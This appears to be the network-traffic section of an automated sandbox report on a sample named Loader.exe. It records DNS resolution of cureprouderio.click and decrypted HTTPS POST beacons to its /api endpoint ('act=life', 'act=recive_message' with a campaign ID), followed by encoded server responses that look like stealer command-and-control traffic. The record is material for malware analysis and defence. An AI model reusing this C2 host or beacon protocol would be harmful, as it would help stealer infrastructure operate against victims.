Dec 28, 2024 04:14:02.315402031 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.315577984 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.315591097 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.315601110 CET	49709	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.315604925 CET	443	49709	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.504439116 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.504487991 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:02.504551888 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.504806995 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:02.504823923 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:03.769797087 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:03.769915104 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:03.771051884 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:03.771070957 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:03.771281004 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:03.772304058 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:03.772404909 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:03.772434950 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:04.647408009 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:04.647496939 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:04.647569895 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:04.647813082 CET	49710	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:04.647842884 CET	443	49710	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:04.766608000 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:04.766649008 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:04.766729116 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:04.767060041 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:04.767071009 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.071960926 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.072098017 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.073406935 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.073419094 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.073631048 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.074748993 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.074866056 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.074882030 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.075053930 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.115328074 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.929920912 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.930020094 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:06.930099010 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.930389881 CET	49711	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:06.930409908 CET	443	49711	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:07.124808073 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:07.124856949 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:07.124941111 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:07.125298023 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:07.125310898 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:08.439095974 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:08.439165115 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:08.443197012 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:08.443213940 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:08.443470955 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:08.445097923 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:08.445281029 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:08.445317030 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:08.445385933 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:08.445394993 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:09.442164898 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:09.442265987 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:09.442321062 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:09.442444086 CET	49712	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:09.442459106 CET	443	49712	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:09.939091921 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:09.939131975 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:09.939197063 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:09.939510107 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:09.939523935 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.204317093 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.204432964 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.214853048 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.214869022 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.215166092 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.221393108 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.221524954 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.221534967 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.969228983 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.969363928 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:11.969419003 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.969563961 CET	49713	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:11.969598055 CET	443	49713	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:12.600239992 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:12.600276947 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:12.600374937 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:12.600769997 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:12.600785017 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.829252005 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.829356909 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.830688953 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.830698013 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.831022024 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.832185984 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833105087 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833144903 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.833256006 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833292961 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.833405018 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833477020 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.833595991 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833616018 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.833759069 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833789110 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.833935976 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.833965063 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.875333071 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.875560999 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.875600100 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.919332981 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.919491053 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.919533014 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.919543028 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.963368893 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:13.963583946 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:13.963618994 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:14.011332035 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:14.011554956 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:14.059325933 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:14.073050976 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:14.073191881 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:14.073246002 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:14.073271990 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:16.198983908 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:16.199106932 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:16.199165106 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:16.199306011 CET	49714	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:16.199325085 CET	443	49714	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:16.208563089 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:16.208621979 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:16.208722115 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:16.209112883 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:16.209130049 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:17.467389107 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:17.467660904 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:17.468879938 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:17.468894005 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:17.469224930 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:17.477405071 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:17.477459908 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:17.477497101 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:18.223155975 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:18.223278046 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:18.223423004 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:18.223499060 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:18.223520041 CET	443	49718	172.67.132.7	192.168.2.5
Dec 28, 2024 04:14:18.223557949 CET	49718	443	192.168.2.5	172.67.132.7
Dec 28, 2024 04:14:18.223566055 CET	443	49718	172.67.132.7	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 04:13:57.649383068 CET	60196	53	192.168.2.5	1.1.1.1
Dec 28, 2024 04:13:57.963618040 CET	53	60196	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 04:13:57.649383068 CET	192.168.2.5	1.1.1.1	0xe89c	Standard query (0)	cureprouderio.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 04:13:57.963618040 CET	1.1.1.1	192.168.2.5	0xe89c	No error (0)	cureprouderio.click		172.67.132.7	A (IP address)	IN (0x0001)	false
Dec 28, 2024 04:13:57.963618040 CET	1.1.1.1	192.168.2.5	0xe89c	No error (0)	cureprouderio.click		104.21.4.114	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cureprouderio.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:13:59 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cureprouderio.click
2024-12-28 03:13:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 03:14:00 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:13:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gsfd1cue1a692i01uiufjme058; expires=Tue, 22 Apr 2025 21:00:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FlPh4lCCDkhrx6AlVJjtF3Lswyj8q19IDwTs7JMuRCahfAvwEr1vT%2FEH9z%2BJxVE6j8JyFkpDrhSM6A%2BqZ9GWvd17osZy%2F6gnd33iHSI4NSxvW0GICPfJz%2BhcPzXqwiKhiyL9PVQp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60ab282d4338-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1768&rtt_var=672&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=910&delivery_rate=1618625&cwnd=193&unsent_bytes=0&cid=971e1c952123fe84&ts=777&x=0"
2024-12-28 03:14:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 03:14:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	172.67.132.7	443	5396	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 03:14:01 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: cureprouderio.click
2024-12-28 03:14:01 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--hubcpvkeaidz&j=
2024-12-28 03:14:02 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 03:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uqh3s46ccq8iom28es3au75nsm; expires=Tue, 22 Apr 2025 21:00:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1PhqbrAgNs8VYjW9PNIJTygMOCp7Uz2EMC%2FbBwJG9F3E8261EAPWexXXrbQXZGdIMRRJ4kwBSzwlYw5KtqQtXNPcq9KMgE%2FEuDs%2B5BMTSW2bsdilTOcfDzJCYaqDCu84dkzB2f2u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8e60b7da674267-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1736&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=957&delivery_rate=1630374&cwnd=234&unsent_bytes=0&cid=428c96dc31e5a756&ts=815&x=0"
2024-12-28 03:14:02 UTC	244	IN	Data Raw: 34 36 61 0d 0a 45 72 74 6c 45 6a 51 52 42 6d 44 67 6f 39 69 75 47 7a 30 6d 4d 64 4c 6d 38 62 46 46 49 6f 62 2f 61 42 47 50 62 59 75 45 41 38 4a 70 6d 52 4d 77 44 69 55 71 51 70 50 47 2b 70 52 76 54 31 4e 55 2f 73 53 51 31 57 63 59 34 4a 34 45 59 75 70 42 71 66 4a 75 34 43 6a 64 42 48 35 48 64 43 70 43 68 64 76 36 6c 45 42 47 42 46 53 38 78 4d 75 54 49 45 6a 6b 6e 67 52 7a 37 67 62 6b 39 47 2b 68 65 74 63 43 65 6c 46 79 59 67 47 4d 7a 72 33 4c 66 6c 78 4d 58 37 75 4c 6d 64 78 6e 44 71 53 61 45 6a 4f 31 54 38 62 68 64 36 4e 66 32 68 5a 35 46 6d 77 71 47 38 4c 47 74 6f 77 68 48 30 64 55 73 49 71 58 31 53 35 4b 37 70 63 4d 63 75 73 48 2b 2b 31 6c 71 6e 72 5a 41 58 74 62 65 33 59 4d 68 73 6d 32 7a 58 52 63 42 42 33 77 67 34 75 Data Ascii: 46aErtlEjQRBmDgo9iuGz0mMdLm8bFFIob/aBGPbYuEA8JpmRMwDiUqQpPG+pRvT1NU/sSQ1WcY4J4EYupBqfJu4CjdBH5HdCpChdv6lEBGBFS8xMuTIEjkngRz7gbk9G+hetcCelFyYgGMzr3LflxMX7uLmdxnDqSaEjO1T8bhd6Nf2hZ5FmwqG8LGtowhH0dUsIqX1S5K7pcMcusH++1lqnrZAXtbe3YMhsm2zXRcBB3wg4u
2024-12-28 03:14:02 UTC	893	IN	Data Raw: 54 66 77 43 33 72 77 6c 69 2f 42 72 6b 39 6d 66 67 62 35 63 65 4d 46 46 2f 4a 46 72 43 79 62 62 43 66 46 78 4c 56 4c 47 45 67 64 77 6e 51 2b 79 56 44 6e 6e 69 41 4f 62 6f 61 36 64 34 30 41 42 2f 55 58 74 69 44 59 47 42 39 49 78 2b 52 77 51 4c 38 4b 53 44 30 43 52 55 36 59 78 4b 62 4b 4d 57 71 65 46 74 34 43 69 5a 41 58 35 58 66 6d 51 51 69 73 71 78 79 57 74 55 54 56 36 39 68 4a 37 5a 4b 45 50 6b 6d 67 42 35 34 67 58 74 36 32 79 6d 63 4e 6c 48 50 68 5a 30 66 45 4c 61 67 5a 6e 4a 61 56 68 49 52 66 4b 2b 30 38 78 70 57 61 53 61 42 6a 4f 31 54 2b 48 6a 59 71 4e 37 31 67 52 34 58 57 46 6b 45 49 54 4d 76 39 35 2f 57 6b 70 5a 73 35 61 5a 33 53 46 44 37 5a 59 44 64 75 6f 4c 71 61 67 68 70 32 69 5a 58 7a 42 33 66 6d 38 4f 69 4e 61 36 6a 47 59 52 58 52 4f 33 69 4e Data Ascii: TfwC3rwli/Brk9mfgb5ceMFF/JFrCybbCfFxLVLGEgdwnQ+yVDnniAOboa6d40AB/UXtiDYGB9Ix+RwQL8KSD0CRU6YxKbKMWqeFt4CiZAX5XfmQQisqxyWtUTV69hJ7ZKEPkmgB54gXt62ymcNlHPhZ0fELagZnJaVhIRfK+08xpWaSaBjO1T+HjYqN71gR4XWFkEITMv95/WkpZs5aZ3SFD7ZYDduoLqaghp2iZXzB3fm8OiNa6jGYRXRO3iN
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 34 34 62 32 0d 0a 43 2b 69 70 54 46 5a 31 2b 71 68 45 70 30 34 55 2b 78 70 6d 36 76 66 39 45 48 63 56 4a 2b 59 41 4f 50 7a 62 50 50 64 56 4e 4d 58 72 79 41 6e 4e 73 76 51 2b 79 50 42 48 33 72 43 65 6e 6a 49 65 34 77 33 68 38 77 44 6a 4e 41 44 4a 58 56 73 59 35 4d 58 45 70 64 74 35 4c 54 7a 47 6c 5a 70 4a 6f 47 4d 37 56 50 35 2b 74 71 72 48 66 51 42 6e 4e 57 65 57 6f 4e 69 4d 6d 79 7a 48 52 65 54 31 75 32 69 5a 6a 63 4b 45 66 73 6e 67 5a 32 34 41 79 70 71 43 47 6e 61 4a 6c 66 4d 48 4e 39 5a 78 4f 54 67 34 2f 50 64 31 46 44 52 66 43 62 33 63 70 6e 52 2b 6a 64 55 6a 50 6e 43 4f 37 69 62 4b 70 7a 33 51 4e 39 57 58 70 74 43 35 44 4c 74 73 4a 72 55 6b 35 57 76 6f 69 57 33 43 64 42 35 5a 4d 41 65 4b 31 42 71 65 46 35 34 43 69 5a 4b 48 31 47 59 57 34 4a 6b 34 4f Data Ascii: 44b2C+ipTFZ1+qhEp04U+xpm6vf9EHcVJ+YAOPzbPPdVNMXryAnNsvQ+yPBH3rCenjIe4w3h8wDjNADJXVsY5MXEpdt5LTzGlZpJoGM7VP5+tqrHfQBnNWeWoNiMmyzHReT1u2iZjcKEfsngZ24AypqCGnaJlfMHN9ZxOTg4/Pd1FDRfCb3cpnR+jdUjPnCO7ibKpz3QN9WXptC5DLtsJrUk5WvoiW3CdB5ZMAeK1BqeF54CiZKH1GYW4Jk4O
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 77 51 4c 38 4b 75 51 78 53 30 41 2b 39 4d 54 4d 2b 6f 44 71 62 34 68 71 6e 7a 64 42 48 78 66 66 32 6b 44 68 73 61 33 79 48 6c 5a 51 6c 61 78 6a 35 76 66 4b 45 72 6f 6d 51 5a 36 36 77 50 71 35 57 66 67 50 70 6b 41 61 42 59 72 4a 43 4f 50 79 72 62 4d 65 6b 35 44 45 2f 37 45 6e 64 55 6e 41 4c 79 4c 47 6d 54 71 45 4b 66 2f 49 61 64 38 6d 56 38 77 58 47 46 68 44 49 62 4c 76 38 68 31 56 55 52 57 6f 6f 79 56 31 43 74 49 34 5a 49 4d 64 75 41 49 34 75 56 7a 73 6e 50 64 43 58 77 57 50 53 51 46 6d 6f 48 69 6a 46 78 49 52 30 4f 32 68 39 50 4d 61 56 6d 6b 6d 67 59 7a 74 55 2f 70 36 47 32 72 64 39 49 4d 64 46 4a 7a 61 51 6d 4d 7a 37 50 41 63 56 4e 44 51 62 32 42 6d 39 6b 75 52 65 69 51 43 57 48 75 44 71 6d 6f 49 61 64 6f 6d 56 38 77 63 55 42 54 49 63 4c 65 39 4e 55 35 Data Ascii: wQL8KuQxS0A+9MTM+oDqb4hqnzdBHxff2kDhsa3yHlZQlaxj5vfKEromQZ66wPq5WfgPpkAaBYrJCOPyrbMek5DE/7EndUnALyLGmTqEKf/Iad8mV8wXGFhDIbLv8h1VURWooyV1CtI4ZIMduAI4uVzsnPdCXwWPSQFmoHijFxIR0O2h9PMaVmkmgYztU/p6G2rd9IMdFJzaQmMz7PAcVNDQb2Bm9kuReiQCWHuDqmoIadomV8wcUBTIcLe9NU5
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 6a 45 76 39 41 6f 53 36 53 43 52 47 71 74 43 4f 57 6d 4f 65 42 33 30 51 39 2b 56 58 56 76 44 6f 37 41 73 38 70 38 56 30 4e 63 74 34 32 55 30 79 46 53 34 35 41 44 63 2b 59 47 34 2b 4a 67 71 7a 43 58 52 33 64 4f 4d 7a 78 43 73 4d 61 73 33 48 6f 66 57 78 32 70 78 4a 54 66 5a 78 69 6b 6b 42 68 79 36 42 33 74 36 57 71 79 65 39 38 48 64 55 52 30 61 41 69 4e 77 72 4c 42 65 6c 64 57 55 37 32 45 67 63 45 68 53 2b 72 64 52 44 50 71 46 36 6d 2b 49 5a 46 6e 30 6b 64 76 47 47 6f 6b 42 59 36 42 34 6f 78 36 56 55 6c 64 6f 6f 43 56 32 43 52 4f 37 4a 67 43 64 2b 63 43 35 75 31 72 71 58 6a 5a 43 48 56 65 65 47 49 4d 67 38 65 32 77 54 6b 52 42 46 53 6f 78 4d 75 54 41 46 72 70 6d 78 31 69 32 41 6a 70 74 79 47 2f 50 73 42 48 64 31 6f 7a 50 45 4b 50 7a 62 44 42 66 46 74 4d 56 Data Ascii: jEv9AoS6SCRGqtCOWmOeB30Q9+VXVvDo7As8p8V0Nct42U0yFS45ADc+YG4+JgqzCXR3dOMzxCsMas3HofWx2pxJTfZxikkBhy6B3t6Wqye98HdUR0aAiNwrLBeldWU72EgcEhS+rdRDPqF6m+IZFn0kdvGGokBY6B4ox6VUldooCV2CRO7JgCd+cC5u1rqXjZCHVeeGIMg8e2wTkRBFSoxMuTAFrpmx1i2AjptyG/PsBHd1ozPEKPzbDBfFtMV
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 4b 5a 30 66 6f 33 56 49 7a 34 77 4c 76 35 32 43 6f 65 4e 6b 42 65 6c 4a 77 62 51 47 46 79 4c 7a 48 65 6c 56 4c 56 4c 61 41 6b 39 67 67 54 75 4b 59 41 58 71 74 51 61 6e 68 65 65 41 6f 6d 53 46 54 52 47 46 57 44 49 48 61 2b 74 4d 33 52 67 52 55 76 4d 54 4c 6b 79 78 49 36 34 38 50 65 75 55 4c 34 4f 5a 6c 71 6e 33 65 42 33 56 62 64 6d 41 4d 68 73 61 36 77 48 5a 59 54 46 79 30 68 4a 79 54 61 51 44 6a 68 55 6f 72 72 53 2f 69 38 45 43 75 65 38 74 48 62 78 68 71 4a 41 57 4f 67 65 4b 4d 64 31 5a 46 57 37 36 49 6d 39 63 31 51 4f 2b 55 42 58 4c 69 44 2b 72 6e 61 36 68 69 33 77 64 37 58 6e 52 73 42 6f 7a 54 75 38 4d 35 45 51 52 55 71 4d 54 4c 6b 78 5a 57 34 35 6f 46 4d 63 51 49 38 75 64 72 6f 33 76 56 52 32 38 59 61 69 51 46 6a 6f 48 69 6a 48 52 54 53 56 65 69 69 4a Data Ascii: KZ0fo3VIz4wLv52CoeNkBelJwbQGFyLzHelVLVLaAk9ggTuKYAXqtQanheeAomSFTRGFWDIHa+tM3RgRUvMTLkyxI648PeuUL4OZlqn3eB3VbdmAMhsa6wHZYTFy0hJyTaQDjhUorrS/i8ECue8tHbxhqJAWOgeKMd1ZFW76Im9c1QO+UBXLiD+rna6hi3wd7XnRsBozTu8M5EQRUqMTLkxZW45oFMcQI8udro3vVR28YaiQFjoHijHRTSVeiiJ
2024-12-28 03:14:02 UTC	1369	IN	Data Raw: 76 4e 30 42 66 65 67 4f 35 65 78 6d 72 6d 4c 59 44 58 78 58 64 47 4d 4a 6b 4d 71 6f 78 33 46 63 53 6c 75 35 68 4a 33 54 4a 6b 33 6b 33 55 51 7a 36 68 65 70 76 69 47 46 55 38 34 52 65 68 52 51 63 78 53 49 78 72 62 61 63 6c 35 48 52 62 32 55 30 35 31 6e 55 65 4f 4d 53 69 76 37 48 2f 37 68 66 75 35 70 6d 51 42 38 46 69 73 6b 43 59 33 50 74 38 64 39 56 6b 46 62 73 34 47 57 32 53 74 4d 35 5a 55 44 65 65 67 4b 37 2b 78 69 72 6e 2f 59 43 33 52 66 66 57 31 43 7a 49 47 39 31 44 6b 48 42 47 57 67 67 34 76 65 4e 77 4c 57 6e 68 74 69 2b 41 4c 35 34 43 4f 50 63 39 55 45 64 56 46 6a 4a 42 33 4d 32 50 72 4c 64 52 38 63 45 37 43 41 6e 39 41 67 54 75 75 51 42 58 54 6d 41 4f 50 6f 63 36 39 31 30 51 74 34 57 32 46 75 43 4a 44 49 73 38 46 33 56 31 5a 51 38 4d 72 54 31 44 38 Data Ascii: 